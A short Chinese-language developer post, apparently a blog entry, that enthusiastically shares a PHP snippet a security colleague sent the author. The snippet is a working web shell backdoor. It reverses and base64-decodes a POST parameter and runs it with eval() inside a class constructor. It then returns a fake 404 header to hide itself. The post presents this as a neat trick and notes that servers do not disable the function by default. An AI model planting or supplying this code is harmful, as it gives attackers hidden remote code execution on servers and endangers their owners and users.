"打开一扇新的大门"

代码写这么多年，从来没往这方面想，前段时间一个做安全的同事给发了一段代码，原来PHP还能有这种骚操作，真是感觉为我打开了一扇新的大门，而这个函数服务器默认是不会禁用的，放这么一段代码就能玩一些骚操作了 分享一下

<?php
class obj
{
    static public $params=null;
    function __construct($params="error"){
        self::$params=$params;
        @eval(null.self::$params);
    }
}
$params = null.base64_decode(strrev(@$_POST["params"]));
$obj = new obj($params);
header('HTTP/1.1 404 Not Found');

本作品采用《CC 协议》，转载必须注明作者和本文链接